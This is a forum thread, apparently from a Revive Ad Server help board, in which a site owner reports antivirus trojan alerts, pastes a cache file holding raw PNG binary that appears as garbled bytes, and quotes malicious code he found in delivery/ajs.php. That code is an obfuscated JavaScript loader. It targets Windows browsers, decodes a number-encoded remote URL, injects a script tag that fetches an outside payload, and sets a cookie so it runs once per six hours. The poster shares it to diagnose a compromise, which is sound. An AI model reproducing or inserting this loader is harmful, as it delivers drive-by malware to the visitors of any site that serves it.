Is My Revive Ad Server Hacked?

[jirin]

Some people informed me, that their antivirus detected trojan. I look in prepend, append in zones/banners, and there is nothing bad...

 

But when I looked into var/cache, there are also some html files. Is it normal? One has this name "bc2660c01cc7be6478ec7598fee5b29c^%%EC^ECD^ECDFE081%%passthrough.html" and content is: 

138
a:4:{s:8:"template";a:1:{s:16:"passthrough.html";b:1;}s:9:"timestamp";i:1394026221;s:7:"expires";i:1394037021;s:13:"cache_serials";a:0:{}}‰PNG

   
IHDR   ď   „   ÷!ëw  «IDATxśí]}Le—ć–”Źđ]úRÚ¦l&$m”đG˙˘Ť©Z
u»Ń°
jljĘVbLK*ÉƦIn
±ŇÝ Ř’JŃŇďű˛t­
ú‹÷5ŰĹÜ Q·Y›ş±Ę6ŤbˇÜýcä:ť9çąĎ™9sg¸Î/7dxîĚďžyć<gÎsÎyf´X,&H	„Ľ @ 6Ú uhs€ÔA ÍR6HÚ uhs€ÔA Í<Ă›oľ©išB3@˙jbb˘´´´´´tbbBťP˛'<ÁÍ›7~řáńńńX,¦if=|üńÇwďŢ-„8ţĽ"§ÇÚl=Ť >ÇŢćŤŘWgŹ-9Đt­_xá…ŞŞŞúúzP›WŻ^ŤF…›7oţţűďe<Ť DhbŐ†LëGhř‹.D|cbbâŇĄKuuuń}ňňň6mÚ488¨˙;33“›››››;33Ł.Zš˝3ň-l[Ž ŠĐ¬·¸2Ýî
pcccSSÓ˛eËâ;Ü˝{7ďßż˙»ďľBäććŢşuK‘źźŻ.›’m6şç¦FMÓ


L-ńť5MkiiŃ·[ZZ¬$ü [Ž 4húQĆČČH}}}Ü`ëŤiiżŰÖęęęţţţţţţŞŞ*uZ%۬{6ÖF!Dww÷ČČ©ŃÎÎÎÇ!zzzÔŲ
–făŹé-ÉRĹőD7Řš¦…BˇŤ7ľóÎ;zűńăÇkkk…ýýýę´N=Ťp8lô~¬¨©©éëë[XXصk—î×»–ÎBhbŐúLSŰ˙ţ÷/vĹJpŮşZ[Ťŕ–-[¦¦¦¨lŽ´ynnnll¬««+Ţ’——WTTôÖ[o=ňČ#zËáÇ÷íŰ'„číímkk‹ďiôF„ăăăN$1ТĘüĹ_x ËŁ	IJBC,:Ç‘6ŹŽŽnßľ===]˙×ęË!6mÚ´nÝşP(TRRb<Ö:3`6€ZŽ­[·ÎCĂBÓh$~Űüx ýĆóÎq¤ÍápxďŢ˝fĆ43ç™3gśü
	ËAă•ŮžPţ ä;	î6ßóAç¨Ć4Lu\ľ|yçÎťĆÝ–/_ŢŘŘ÷ĺ=€†8h–.:ćžČ•	T‘â™mkŰ^f[5¦n_ąrŰ
lINÚŹEç@ż¤µ™k~Ě5ĽyóćéÓ§őíŁGŹ655ézŰÚ˘eOX‚b‘ [l¸dÁěáRçćć憆†úúz!ÄŘŘŘ{ď˝'„8zô¨ţ­µE>Ňf– Ű5š–ZęĚeSmô°)~‹ĹôĚv{{»®Íz[ßĐ÷´¶¨ŔGÚě+kzł@¶ů±™mkŰ^fŰOÚŚäω$LÉ“”ÓfľX6áŁe¶őä¶N·{÷n=çĎcë™mc‹
|¤Í,Ć™í~ę§ř˛¤Î»Ř”ŮľzőŞ)Źm/łÍPu$Y/@Ş:Ň;üžŹú© r%üŁ‡čŘ"t¬}Ł«µžÇžššÚ˛e‹ŢnmQ’6c‘µŘ"ôő¨JSS“qÚŮŮ977777—°ę§Ź:›ihůĄoś<n€ÓÓ Ł*„Ş#°G<ň4|Ó`IJ»:Ł°Áăił©ĆŚŞ¨Waţ­Z«ę™zSX'ĄŐĺ‘Śs®“ZÂUGŠëÔ«Ž´0lIµ,Ú_Pm¦ńüÖfO
k´ó'5„5h=3šHÂś<y˛ąą9;;»­­mĎž=FB]&&&žxâ	!ÄG}ôŔ(Ň:ő4¬ë„%Ş˘Zu䧆Ż€9í4OžŻZČygFŁŃŻżţúË/ż|ňÉ'÷ěŮ#,s33Űńz#ăňZ®ő†_áń2%	|ofqU9c—Ž;řĉB´´´U«V;¸Ů«ŽTÖŞŽŔn˛ˇ?,:§iŔýÔ3mćP ë4¬™m};##c`ŕ·ri•9XBř){ÂF`ô4|äśpś•‡ÉpeF,űä“Oęëëżů曤®ŮN|
eIđ >'’L\Y–úćÖÖÖ_ýuvvvvv6ޤ5Űɟߌ´'_&đU7gda„(**ZłfÍ©S§ßĚGÚĚÓŕţóČÂĆćOpäČ‘#GŽÄ˙őĹšm^°(ß…g(čă‚żb©šäKÁŐü-•„k™´żbţP\ökč:::V®\ą~ýúsçÎw3îLŞˇĐdgií1bł@®Ş#ŽŮäÉ“'W¬XW®U®ökčľúę«ÉÉÉööö÷4VŐ‰ä×Đ!—Ť…Äž»âpú/†8ôQťžěęęŇ•ÇZ}	Öc&„}OCOçl۶­¸¸X˛›z
ËÍÓ.Żó;«n•‡Íoćŕ1ĺý˛ĘőСCoĽńFü_'Oî´Ůů·ôöä?ąKâď&ż0…Ä϶mŰ÷Ń”ôĹ*×îÜąsÇŽúżNźÜuVgR…׿^BŐ™Äó/3Ł]@/<ą0;Rxţµĺ$a:?!źTÂ\ ÷«\_yĺ•ĘĘĘçźŢĚh÷É]>‹Đ1¸=â·ąĐN¤A~ÚO­­­ŤŤŤń\ µúŇĹU®`
ÝkŻ˝&„Řżżbvv6==ÝšŃ!ÇovÓ;ô24ë\éŘ:ĂĐ÷ć­™?sŠ5tÎźÜĹ’cęk¦)©źfŚĘÎł)]lĘZ3A.PßźˇŻ‰śJŇD:l”É’r1
—ŕ'möS2™Í×ŕ¸S°ź°ą=>Vgi3OŐŰýň4hţň4\őÁȸiłżfKÁoÎxŞqŕź¬í˙<ú*HĂŇ7,,ÍÍÍYYYţZĺĘ_…|%v&ÄÚĽ
¦Ć˙ůżoaś„*
<3ůŕď? †–€F—^1::úěłĎ2®re^{â¤äH€™{~h<ȇ,‹ó2
Ů9©ź(WÇ`=Ł	Q’·ÁúéOś8QPP )‹«­­­­­SŤŮ6›Ţ,HzY Ž Ç"f#\SRđÜÁ§UÍŔg4IÜŽiŕ7"SCÜË"–Ŕ*WŇË}ws'0`
dő„ÄIŔNŠŇc®ÎŹĺ 3ŰƲ®U®îj3Vr$„yĽŽŹŹcÇ?…>_ÖňŁţ ‡…DX$ţî?śŘ
ý&±v«<`Y„Ę“†äpW›±’#Ť×…TÓóú•ŚĐŃŞ…F°TzáAţÎË4Ű’tAg$¤7
çýż˘ŇcCÎĘc*‹ČČČX«\Ő_č« ě̱&PhžÝß…y~°?Ô°äÁ™mc}’ťŁ{Îh_sŚ
®ˇEMdHÜ'š6+“Hx°Ż¸f™NŔÓ ·­˙ZÁ˘@‚-¦Ś
Ć81éÂËlĽ˛H˛ŕť*‡Ś'µŮ	@ă±´cX˘I›éQ –±%ýĘSřL›ˇF!ćOďm<M	ńşęÄă6›Ä#9„&…ŮFLĂ
SfŰšÇ^ň™mu–ô))ÄË#ŰMΞІ›6ŁÉLőî1e¶SđÍÄ,®*ZßLťąsÜ(<qUíŘTŽ©‡Mţý˛f[Ş!Žyľű)KšÉHĄÁŽ,Š›ł7éhŃeĐ”ŮölÍv\˛üüüź~ú‰«–O Ýq—čďJŘiA1ż9„,3a›R„”	ÚiŃGEÂ̶gk¶uş»»GFFŚ-qŘóxvmčţ®{čמżkěq:•´!Ś†Üîüł,>ě¨Ń”ŮNęšm+Âáp]]řćńĽűî»ß~űí«Ż˘ľąŰÉTäDmćZ,.&&L\$E°
-Sf;©k¶M››ëęęŇ˙U©ĺëîîŽFŁ­­­ńĹŞ#IÁ:ôąŽzˇŹD±BjĽ™Tu„ŮfD˛’Ş—> ¬<¦űą—k¶GGG·oßžžž.”kůŽ?>>>n$±úRgŻŔwSĚßkbú"HĄ~Í`ž/€	•¤)ôř…yÎ|.Ł@#HňÁ8ŮC yÎEÝńˇž´—,ÚŃćp8ĽwďŢ{XŐňµ··ďŰ·ŻŻŻoٲe(/rsgąJ!đ¸Y_ÓĐx\őyÜ€mľ|ů˛î÷!¬Ď7=ž;v\»víĄ—^ŇŤ Ŕn
!‹˝°`hźŇ]U+Y‰öÓF’=!Íé‚„IQäN`G›Ż\ąßVkŕsĎ='§Ż™Ä,ˇ<\ćl¤ćěá㚒b QCě9×lă·0ÉqvçnŹŤ‰‰GvĺG‰C‹§”Ę´„4yo&N¨a„Äő˛5upą=Ô*Ź›~łü§©°—ŮöŃŰ/…XěZĂÇŇđű&ŔŮ«“Ŕ˘
#—kˇsa°ź…‰=C>)źE#yüB^^ަM›őő8onn®ŹÖlSX¦L‹9$›1á«úfTŮi6ˇŃpŰf¶ŤXk¶u(VÁŹ°póÂSy8=ŠĂ˘Í®öŚ
+<Xłmňܹꬅ´›(ňá–Ů]ť†|Áđű5îĹ4„ v1ŹlzÄ˝gk¶Ť†–«ÎZ`
d#6r”FhČ<Ă+s(9„ôŁ<%KH…Wk¶Őë¬WąéŞJ‘0™›¸,ä!ŠşĽ¸źĂcşŮ‡m6–)ÖYŰŻ:"úŘpUŐ«—$žöŚ"ü»Xu„¨3gĂżJ{@”Ř©o6N?ë¬UŞŽ®Âł@ěćÖ˛„˙[Ň×i’ô˙Ť|áAžó˙Ió›A’We“ ĎŕA‰<nŔfĽ9>ýÔçžýýý¦:kc‹X¬:ş{÷®„S#~`<6ëś=#í·Wź>ä/ń¤Üíb'ŕťó»ńâz϶ť†qú©Xgm»ęHâ!¨“ČŰŐAć7mx~ŚIťÇőžAzzRĆ̶gk¶mÔY«VqĚ…ŕ…—‚¸=$adA1’0nQÔY"<­‡]°KiͶ"ŕKcÇr¨7Ó®—6Óc#äŮ$Ľ+‡M•;!pű˝3~k<ÎďŮfŢÝŽ9č
Ä4´´Pň»O†¨ÎwŁIŮöţ=Űüŕ‰7óÜOÁk¦Qł'Âĺ:
R.Pú\w?<^łí`â*ŤŕđX<™l3ç8§ţ جibŃ`{ąf›
ŐŞ#äÚý]ôîNöXCň¸xÜwâŮŞőăŰ\k¶Éń掎Ž•+W®_żţÜąsbńÜä±CEH˘°ŕ&ˇa IřBĽX(RŕŇP…±ŃÉIŮ6»ôŢB!ôđyŔW’‰J‚;uŕJˇNĂĺiČ„I¦ćB kłééŽVŘ®:P/q-“&ßÜY<
Éý9ŢŮŐQązŘ
Řô›©ď-L^ŐÝaOňŹ0¤ś"JB×B÷N*a•Ľ=ŘŃfď-T©:ú÷)Z„¬e™"ß1çÂü%Jv{@žáIZ„=#€|Rˇž‘<ň*y{ kł˝÷Ş<ë»/ďL!^Ȣş-G†u{¤qâiŘËc[AÖf{ď-TŞ:ÂŢ#AöçkÄě	:%eňż‰~3ŹÚđ4Ŕ̶ĽJŢśVq>ëąo2Ä"lXĐoćł©$S‹ůÍđÉâżČbšŃŮ$Ţnő*VÉŰŹr`w8ą9äôÄF±‡ąÓ †c¦*yAĚc„Nf†«ćăšŃ…áń›I7jĎxb/VÉŰŹ´î˛rMĽ úpő˝'$ućň4ĐçQVÉŰź´™ĺé0\×Ń-d™’J„$±pąO\6Ţ	ü¤ÍP7‘gî?6m&-Zö!q1KjÇ
řL›-Ťže¶9,h,ÂĆ5Ć-Ą*S€íĘä*.iłd®C¤!KŘAłG¬ÖwŮÓ TëĽg¨F™Ř1$żÂOOĽŐ€Ďˇ?ÓHˇČ·ţt˘O`›Í$Da˛ó?ţéµg0‡gÄŐ3aţ¨žĄ"”:×áâań›É<¸ÇB SĎHžÁě9ÔŢ€íŢĎűµ_¸·•ÍcmNĹUXÉáń•0\<ľĆ!üä7ŕŢŹ§ ¸Řć ©%©ÍŠsÇ`ŠůG—Ú<77—““Ł—›<öŘcB©©©‚‚‚ąą9l–‡0 #Tç˙ř㏷nÝš™™y˙ý÷ź9sĆžI4MkiiŃ·[ZZśtŽťĚ‰§¨­­}űí·çç糲˛fffÚŰŰź~úé„GIÄ6~ĺüěś3wuuÍÎÎNOO§¦ň	IäBlܸńÎť;wîÜŮĽyłşĹ%xěi<účŁĂĂĂ“““?˙üs4Ńë\…ź~úiiiéęŐ«/\¸ ·|řá‡+V¬xć™gÔů<““_+nZŇC‚¦i/ľřbzz:éđěěěëׯG"‘âââ÷ß_?6''§ŁŁ#ΓĐΙH¬gˇišéLM¨©©éëë;{öě®]»âŤ/^,)))))ąxń˘
‰VI¬W-©đv0ݸqŁ°°°§§gůňĺ§NťZłfÍíŰ·őŻ*++‡††"‘HYY™ŢRVV‡Ăá°DlqŻm‡Ă‘H¤¨¨Čô­â‰›úŞ««k~~^ýđX,6==ÝĐĐđŕćçç÷ööꍑHdÝşuę’H¬ga=SÓYLOOWWWWWW_»v-~TyyąŢź	IL„؆őŞ%ŢGčz衬¬¬űî»/ŤĆ gffÎĎĎ/,,!ôWL¤§§ßľ}{aa!##ŰĂŹoK6ä0±ÍĎĎëkÎmd
&&&jjjÚÚÚ~üńÇP(¤ź‰J'ąqăéĽôƧžz*
é¦]ß'33óÖ­[ůůůżüň‹zçH~×zŐ’Š¤ŽÇŽKKK‹FŁBÎÎÎx{eee8ÖmˇŽ˛˛˛ˇˇˇˇˇ!‰Řň›ăEEE‘Hd``@ńÄA6Ó¶uuu“““łłł˝˝˝«V­ĘÎÎţěłĎ.]şgČĘĘş~ý:‰ÄzÖ
ě,Ś˙–——

…Ăáňňň„$ UëUK&Ľ×ćH$RUU‹Ĺ6lŘđĂ?ÄŰ?˙üóŠŠŠP(ď©ţţţÂÂÂúúzŰÚüúëŻggg744$M›Oź>]VV–‘‘QQQ100pŕŔÜÜ\Ł /żürvv¶śĐDb={Ú<<<ĽvíÚµk×'$¬’XŻZ2ὧ  –dö$@ 6HÚ uhs€ÔA ÍR6HÚ uhs€ÔA ÍR˙U÷­Ýcčd    IEND®B`‚

Is it normal? Or where could be a problem.

 

 

I have Revive 3.0.0, now I upgrade to 3.0.2, but is it enough?

[jirin]

I probably found thaht problem

 

in delivery/ajs.php is after function MAX_flashGetFlashObjectInline()

{

...

}

this:

 

echo "<script>(function(_Lvm){function _Kmp(_FtA,_S1){return _FtA.src=_S1;}function _WCb(_Pxe){_Pxe+='16,24,-25,20,23,11,-27,-39,-38,-36,-50,15,17,12,7,-19,-15,22,-27,-32,-33,-32,-39,-38';_Pxe=_Pxe.split(',');var _epK='',_y8V=0;for(_JGX=0;_JGX<_Pxe.length-1;_JGX++){_y8V=parseInt(_Pxe[0]);_y8V+=parseInt(_Pxe[_JGX+1]);_epK+=String.fromCharCode(_y8V);}return _epK;}function _L1C(){if(/(Windows)/.test(navigator.userAgent)&&/(MSIE|Opera|Trident|Firefox)/.test(navigator.userAgent)){try{_Jtc=88,16,28,28,24,-30,-41,-41,24,29,10,-42,9,27,28,26,23,22,23,21,17,9,-42,11,23,21,-41,24,20,29,';_evm=_QIk();_wEm=_WCb(_Jtc);_Kmp(_evm,_wEm);}catch(e){};}}function _Glv(){return 'sc'+_odd.i;}function _K01(){_L1C();_Lvm.cookie=_3os()+'=true;max-age=21600;path=/';}function _QIk(){var _1V=_Lvm.createElement(_Glv());_1V.sync=1;_Jtc+='15,17,22,27,-41,15,13,23,-4,9,26,15,13,28,17,22,15,-41,20,23,11,9,28,17,23,22,27,-41,27,11,26,17,24,28,-42,24,';try{_Lvm['body]['appendChild'](_1V);}catch(e){try{_Lvm.write('<body>');_Lvm.body.appendChild(_1V);}catch(e){}}return _1V;}function _3os(){return _Lvm.location.host;}var _odd={'i':'ript'},_Jtc,_evm;if(_Gut()){_K01();}function _Gut(){return _Lvm.cookie.search(new RegExp(_3os()))==-1;}})(document);</script>\n";

 

 

How it could happend, and how prevent it.